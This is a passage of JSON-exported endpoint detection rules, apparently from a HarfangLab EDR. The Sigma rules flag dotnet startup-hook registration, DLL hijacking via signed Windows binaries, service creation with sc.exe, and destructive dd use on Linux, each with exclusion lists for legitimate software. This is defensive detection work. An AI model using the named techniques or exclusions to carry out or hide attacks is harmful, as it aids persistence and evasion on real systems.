investigate the process to determine its legitimacy.\n", "rule_creation_date": "2025-10-13", "rule_modified_date": "2025-10-22", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1553.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2580b2f9-373b-4a4c-9b57-13e458627130", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.098306Z", "creation_date": "2026-03-23T11:45:34.098308Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.098312Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-2---dll-side-loading-using-the-dotnet-startup-hook-environment-variable", "https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_sideloading_dotnet_startup_hook.yml", "content": "title: Dotnet Startup Hook Environment Variable Set\nid: 2580b2f9-373b-4a4c-9b57-13e458627130\ndescription: |\n Detects the registration of a dotnet startup hook using the DOTNET_STARTUP_HOOKS environment variable.\n Adversaries can register a malicious assembly that will be executed whenever a .net core application is started.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-2---dll-side-loading-using-the-dotnet-startup-hook-environment-variable\n - https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/12/23\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'Cmd.EXE'\n CommandLine|contains|all:\n - 'set '\n - 'DOTNET_STARTUP_HOOKS='\n\n condition: selection\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2580b2f9-373b-4a4c-9b57-13e458627130", "rule_name": "Dotnet Startup Hook Environment Variable Set", "rule_description": "Detects the registration of a dotnet startup hook using the DOTNET_STARTUP_HOOKS environment variable.\nAdversaries can register a malicious assembly that will be executed whenever a .net core application is started.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-12-23", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "258b150d-0fe4-48e0-93bc-09d02567ecb8", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.592069Z", "creation_date": "2026-03-23T11:45:34.592072Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.592080Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_microsoftedgesh.yml", "content": "title: DLL Hijacking via microsoftedgesh.exe\nid: 258b150d-0fe4-48e0-93bc-09d02567ecb8\ndescription: |\n Detects potential Windows DLL Hijacking via microsoftedgesh.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'microsoftedgesh.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\USERENV.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "258b150d-0fe4-48e0-93bc-09d02567ecb8", "rule_name": "DLL Hijacking via microsoftedgesh.exe", "rule_description": "Detects potential Windows DLL Hijacking via microsoftedgesh.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "25bdc370-c782-4157-b467-3e74718d8b59", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "low", "rule_effective_confidence": "weak", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.074695Z", "creation_date": "2026-03-23T11:45:34.074697Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.074702Z", "rule_level": "low", "rule_confidence": "weak", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1543/003/" ], "name": "t1543_003_manual_service_creation_with_sc.yml", "content": "title: Service Created via sc.exe\nid: 25bdc370-c782-4157-b467-3e74718d8b59\ndescription: |\n Detects the manual creation of a Windows service using sc.exe.\n While sc.exe is a legitimate Windows tool for managing services, its manual use outside of an installer can indicate adversaries may be creating a Windows service to achieve persistence.\n It is recommended to investigate suspicious service creation events through sc.exe, specially if they are not part of an installation process, and validate the service binary path and account privileges.\nreferences:\n - https://attack.mitre.org/techniques/T1543/003/\ndate: 2022/12/02\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1543.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Sc\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.ServiceCreation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'sc.exe'\n CommandLine|contains|all:\n - ' create'\n - 'binPath='\n\n exclusion_logisync:\n GrandparentImage:\n - '?:\\Program Files (x86)\\Logitech\\LogiSync\\sync-agent\\LogiSyncHandler.exe'\n - '?:\\Program Files\\Logitech\\LogiSync\\sync-agent\\LogiSyncHandler.exe'\n\n exclusion_intel:\n CurrentDirectory|startswith:\n - '?:\\Program Files\\Intel\\'\n - '?:\\Program Files (x86)\\Intel\\'\n\n exclusion_installer:\n GrandparentImage:\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n - '?:\\Windows\\System32\\msiexec.exe'\n\n exclusion_listary:\n CommandLine|contains: ' ListaryService'\n\n exclusion_webcompanion:\n ParentImage|endswith: '\\WebCompanionInstaller.exe'\n\n exclusion_parsec:\n GrandparentImage|endswith: '\\parsec-windows.exe'\n\n exclusion_autodesk:\n GrandparentImage|endswith: '\\AdODIS-installer.exe'\n\n exclusion_dell:\n GrandparentImage|endswith: '\\invcol.exe'\n\n exclusion_hp:\n ParentImage:\n - '?:\\Program Files\\HP\\HP Touchpoint Analytics Client Installer\\TAInstaller.exe'\n - '?:\\Program Files (x86)\\HP\\HP Touchpoint Analytics Client Installer\\TAInstaller.exe'\n - '?:\\Program Files\\Hewlett-Packard\\HP Touchpoint Manager\\Tools\\tainstaller.exe'\n - '?:\\Program Files (x86)\\Hewlett-Packard\\HP Touchpoint Manager\\Tools\\tainstaller.exe'\n\n exclusion_varian:\n CommandLine|contains: 'create VarianVDTRSDAgent binPath= *VMS.RemoteASD.VDTAgent.exe'\n ParentImage: '?:\\ProgramData\\VDT.exe'\n\n exclusion_asus_removetool:\n GrandparentImage: '?:\\Program Files\\ASUS\\ABM\\service\\RemoveTool.exe'\n\n exclusion_nable:\n ParentImage: '?:\\Program Files (x86)\\N-able Technologies\\Windows Agent\\bin\\agent.exe'\n CommandLine|contains: 'sc.exe create AutomationManagerAgent start= auto displayName= Automation Manager Agent binPath= ??:\\Program Files (x86)\\N-Able Technologies\\AutomationManagerAgent\\AutomationManager.AgentService.exe?'\n\n exclusion_trendmicro:\n ParentImage: '?:\\Program Files\\Trend Micro\\Deep Security Agent\\dsa.exe'\n CommandLine|contains: 'sc.exe create ds_nuagent start= disabled binpath= ??:\\Program Files\\Trend Micro\\Deep Security Agent\\nuagent\\ds_nuagent.exe?'\n\n exclusion_totalav:\n ParentImage: '?:\\Program Files (x86)\\TotalAV\\SecurityService.exe'\n CommandLine|contains: 'sc create ProtectedELAM binpath= ?:\\WINDOWS\\system32\\drivers\\protected_elam.sys'\n\n exclusion_mcafee:\n ParentImage:\n - '?:\\Program Files\\Common Files\\McAfee\\PEF\\Installer\\InstallPEF.exe'\n - '?:\\Program Files\\McAfee\\Temp??????????\\installer.exe'\n CommandLine|contains:\n - 'SC.exe create PEFService start= auto binpath= ??:\\Program Files\\Common Files\\McAfee\\PEF\\CORE\\PEFService.exe? DisplayName= McAfee PEF Service'\n - 'sc.exe create McAfee WebAdvisor binPath= ??:\\Program Files\\McAfee\\WebAdvisor\\ServiceHost.exe? start= auto DisplayName= McAfee WebAdvisor'\n\n exclusion_huawei:\n ParentImage:\n - '?:\\ProgramData\\Comms\\PCManager\\DriverUpgrade\\Update\\Downloaded\\\\*\\PCManager_Setup_*_x64.exe'\n - '?:\\Program Files\\Huawei\\PCManager\\AccessoryCenter_Setup.exe'\n - '?:\\Program Files\\Huawei\\PCManager\\BasicService_Setup.exe'\n - '?:\\Program Files\\Huawei\\PCManager\\HiviewService_Setup.exe'\n - '?:\\Program Files\\Huawei\\PCManager\\LCDEnhancement_step.exe'\n - '*\\MSPCManagerOffline.exe'\n CommandLine|contains:\n - 'sc.exe create HiConnectivityService DisplayName= Huawei Connectivity Windows Service start= auto binPath= ??:\\Program Files\\Huawei\\PCManager\\HiConnectivityService.exe?'\n - 'sc.exe create HiviewService DisplayName= Huawei Hiview Windows Service start= auto binPath= ??:\\Program Files\\Huawei\\Hiview\\HiviewService.exe?'\n - 'sc.exe create HwDistributedMainService DisplayName= Huawei Distributed Windows Service start= auto binPath= ??:\\Program Files\\Huawei\\PCManager\\HwDistributedMainService.exe?'\n - 'sc.exe create HwPCCoreService DisplayName= Huawei PC Core Service start= auto binPath= ??:\\Program Files\\Huawei\\BasicService\\BasicService.exe?'\n - 'sc.exe create LCD_Service DisplayName= Huawei LCD_Service start= auto binPath= ??:\\Program Files\\Huawei\\HwLcdEnhancement\\LCD_Service.exe?'\n - 'sc.exe create MBAMainService DisplayName= Huawei PCManager Windows Service start= auto binPath= ??:\\Program Files\\Huawei\\PCManager\\MateBookService.exe?'\n - 'sc.exe create PCManager Service start= auto binpath=?:\\Program Files\\Microsoft PC Manager\\MSPCManagerService.exe'\n\n exclusion_panda:\n GrandparentCommandLine:\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\Program Files (x86)\\Panda Cloud Systems Management\\UltraVNC\\vnc_configure.cmd ?:\\Program Files (x86)\\Panda Cloud Systems Management\\UltraVNC\\winvnc.exe'\n - '?:\\Program Files (x86)\\Panda Cloud Systems Management\\CagService.exe'\n CommandLine:\n - 'SC create uvnc_service binpath= ??:\\Program Files (x86)\\Panda Cloud Systems Management\\UltraVNC\\winvnc.exe? -service start= auto'\n - 'SC create uvnc_service binpath= ??:\\Program Files (x86)\\Panda Systems Management\\UltraVNC\\winvnc.exe? -service start= auto'\n\n exclusion_centrastage:\n GrandparentImage: '?:\\Program Files (x86)\\CentraStage\\CagService.exe'\n CommandLine: 'SC create uvnc_service binpath= ??:\\Program Files (x86)\\CentraStage\\UltraVNC\\winvnc.exe? -service start= auto'\n\n exclusion_alienware:\n GrandparentImage: '?:\\Program Files\\Alienware\\Alienware Command Center\\OCControlService\\OCControl.Service.exe'\n CommandLine: 'sc create AMDRyzenMasterDriverV?? binPath= ?:\\Program Files\\Alienware\\AMDRyzenMasterDriver\\bin\\AMDRyzenMasterDriver.sys type= kernel start= auto'\n\n exclusion_rustdesk:\n CommandLine: 'sc create RustDesk binpath= \"?:\\Program Files\\RustDesk\\RustDesk.exe\" * start= auto DisplayName= RustDesk Service'\n ParentCommandLine:\n - '?:\\Windows\\System32\\cmd.exe /C ?:\\WINDOWS\\TEMP\\RustDesk_install.bat'\n - '?:\\Windows\\System32\\cmd.exe /C ?:\\Windows\\SystemTemp\\RustDesk_install.bat'\n - '?:\\Windows\\System32\\cmd.exe /C ?:\\Users\\\\*\\AppData\\Local\\Temp\\RustDesk_install.bat'\n\n exclusion_heat:\n CommandLine:\n - '?:\\Windows\\system32\\sc.exe create gzflt type= filesys displayname= gzflt start= demand binPath= ?:\\Windows\\system32\\drivers\\gzflt.sys depend= FltMgr group= FSFilter Anti-Virus tag= yes'\n - '?:\\Windows\\system32\\sc.exe create Trufos type= filesys displayname= Trufos start= demand binPath= ?:\\Windows\\system32\\drivers\\trufos.sys depend= FltMgr group= Boot Bus Extender tag= yes'\n GrandparentImage: '?:\\Program Files\\HEAT Software\\EMSSAgent\\\\??\\luarunner.exe'\n\n exclusion_mspecosystem:\n CommandLine:\n - '?:\\WINDOWS\\system32\\sc.exe create EcosystemAgentMaintenance start= auto DisplayName= Ecosystem Agent Maintenance binPath= ?:\\Program Files (x86)\\SolarWinds MSP\\Ecosystem Agent\\SolarWinds.MSP.Ecosystem.WindowsAgentMaint.exe'\n - '?:\\WINDOWS\\system32\\sc.exe create EcosystemAgent start= auto DisplayName= Ecosystem Agent binPath= ?:\\Program Files (x86)\\SolarWinds MSP\\Ecosystem Agent\\SolarWinds.MSP.Ecosystem.WindowsAgent.exe'\n - '?:\\WINDOWS\\system32\\sc.exe create EcosystemAgentMaintenance start= auto DisplayName= Ecosystem Agent Maintenance binPath= ?:\\Program Files (x86)\\N-able Technologies\\Ecosystem Agent\\Nable.Ecosystem.WindowsAgentMaint.exe'\n - '?:\\WINDOWS\\system32\\sc.exe create EcosystemAgent start= auto DisplayName= Ecosystem Agent binPath= ?:\\Program Files (x86)\\N-able Technologies\\Ecosystem Agent\\Nable.Ecosystem.WindowsAgent.exe'\n GrandparentImage: '?:\\ProgramData\\MSPEcosystem\\FileCache\\Upgrade\\Ecosystem.AgentSetup.exe'\n\n exclusion_admincenter:\n CommandLine|contains: 'binpath= ?:\\Program Files\\WindowsAdminCenter\\Service\\'\n ProcessGrandparentInternalName: 'Windows Admin Center (v2)'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Microsoft Corporation'\n\n exclusion_matrix42:\n CommandLine|contains: 'binPath= \"?:\\Program Files\\Matrix42\\Maintenance Service\\Matrix42MaintenanceService.exe\"'\n ParentCommandLine|contains: 'Packages\\Matrix42\\UEM Agent Windows\\'\n\n exclusion_puppet_agent:\n ParentImage: '?:\\Program Files\\Puppet Labs\\\\*\\bin\\ruby.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\n#level: medium\nconfidence: weak\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "25bdc370-c782-4157-b467-3e74718d8b59", "rule_name": "Service Created via sc.exe", "rule_description": "Detects the manual creation of a Windows service using sc.exe.\nWhile sc.exe is a legitimate Windows tool for managing services, its manual use outside of an installer can indicate adversaries may be creating a Windows service to achieve persistence.\nIt is recommended to investigate suspicious service creation events through sc.exe, specially if they are not part of an installation process, and validate the service binary path and account privileges.\n", "rule_creation_date": "2022-12-02", "rule_modified_date": "2025-04-15", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1543.003" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "25c7fcff-2700-4b0e-81d3-c467def3ef7e", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.095213Z", "creation_date": "2026-03-23T11:45:34.095215Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.095219Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_systempropertiesremote.yml", "content": "title: DLL Hijacking via systempropertiesremote.exe\nid: 25c7fcff-2700-4b0e-81d3-c467def3ef7e\ndescription: |\n Detects potential Windows DLL Hijacking via systempropertiesremote.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'systempropertiesremote.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "25c7fcff-2700-4b0e-81d3-c467def3ef7e", "rule_name": "DLL Hijacking via systempropertiesremote.exe", "rule_description": "Detects potential Windows DLL Hijacking via systempropertiesremote.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2650626f-6d1c-4193-b47e-4a0e51549c76", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-24T07:14:08.475670Z", "creation_date": "2026-03-23T11:45:34.624029Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.624033Z", "rule_level": "medium", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://man7.org/linux/man-pages/man1/dd.1.html", "https://attack.mitre.org/techniques/T1485/", "https://attack.mitre.org/techniques/T1027/001/" ], "name": "t1485_suspicious_dd_usage_linux.yml", "content": "title: Suspicious Usage of dd (Linux)\nid: 2650626f-6d1c-4193-b47e-4a0e51549c76\ndescription: |\n Detects the execution of dd with /dev/zero, /dev/random or /dev/urandom as its input file.\n This could be used by an attacker to either securely delete a file from the disk or to achieve mass data destruction.\n It can also be used as a binary padding technique to add junk data and change the on-disk representation of a file.\n It is recommended to analyze the process calling dd to look for other malicious actions or content.\nreferences:\n - https://man7.org/linux/man-pages/man1/dd.1.html\n - https://attack.mitre.org/techniques/T1485/\n - https://attack.mitre.org/techniques/T1027/001/\ndate: 2021/09/24\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1485\n - attack.defense_evasion\n - attack.t1027.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Dd\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.Deletion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n # /usr/bin/dd\n # /usr/lib/klibc/bin/dd\n Image|endswith: '/dd'\n CommandLine|contains:\n - 'if=/dev/zero'\n - 'if=/dev/random'\n - 'if=/dev/urandom'\n ParentImage|contains: '?'\n\n exclusion_commandline:\n CommandLine|contains:\n - ' status=progress'\n - ' conv='\n\n exclusion_initfs:\n CommandLine|contains: 'of=/var/tmp/mkinitramfs_*/.random-seed'\n\n exclusion_cron:\n Ancestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n\n exclusion_apt:\n Ancestors|contains: '|/usr/bin/apt|'\n\n exclusion_dpkg:\n Ancestors|contains: '|/usr/bin/dpkg|'\n\n exclusion_apt-compat:\n CommandLine: 'dd if=/dev/urandom bs=2 count=1'\n ParentCommandLine: '/bin/sh /etc/cron.daily/apt-compat'\n\n exclusion_cron_hourly:\n ParentCommandLine|startswith: '/bin/sh /etc/cron.hourly/'\n CommandLine: 'dd if=/dev/urandom bs=2 count=1'\n\n exclusion_filebeat:\n ParentCommandLine: '/bin/bash */config/filebeat-* test'\n\n exclusion_yocto_sdk:\n Image: '/opt/yocto/*/usr/bin/dd'\n\n exclusion_cronapt:\n - ParentCommandLine: '/bin/sh /usr/sbin/cron-apt'\n - GrandparentCommandLine: '/bin/sh /usr/sbin/cron-apt'\n\n exclusion_netflow:\n CommandLine: 'dd bs=18 count=1 if=/dev/urandom'\n ParentCommandLine: '/bin/bash -ue .command.run'\n\n exclusion_leapp:\n - ParentCommandLine|startswith:\n - '/usr/bin/python2 /bin/leapp '\n - '/usr/bin/python2 /usr/bin/leapp '\n - '/usr/libexec/platform-python /bin/leapp '\n - '/usr/libexec/platform-python /usr/bin/leapp '\n - CurrentDirectory|startswith: '/usr/share/leapp-repository/repositories/system_upgrade/common/actors/'\n\n exclusion_rust:\n GrandparentCommandLine|endswith: '/.rustup/toolchains/stable-x86_64-unknown-linux*/bin/cargo'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_commvault:\n - Ancestors|contains: '|/opt/commvault/Base64/cvflock|'\n - CommandLine: 'dd if=/dev/urandom bs=1 count=32'\n ParentCommandLine|startswith:\n - '/bin/sh /opt/commvault/Base/Galaxy '\n - '/bin/sh /opt/commvault?/Base/Galaxy '\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2650626f-6d1c-4193-b47e-4a0e51549c76", "rule_name": "Suspicious Usage of dd (Linux)", "rule_description": "Detects the execution of dd with /dev/zero, /dev/random or /dev/urandom as its input file.\nThis could be used by an attacker to either securely delete a file from the disk or to achieve mass data destruction.\nIt can also be used as a binary padding technique to add junk data and change the on-disk representation of a file.\nIt is recommended to analyze the process calling dd to look for other malicious actions or content.\n", "rule_creation_date": "2021-09-24", "rule_modified_date": "2026-03-23", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.impact" ], "rule_technique_tags": [ "attack.t1027.001", "attack.t1485" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": 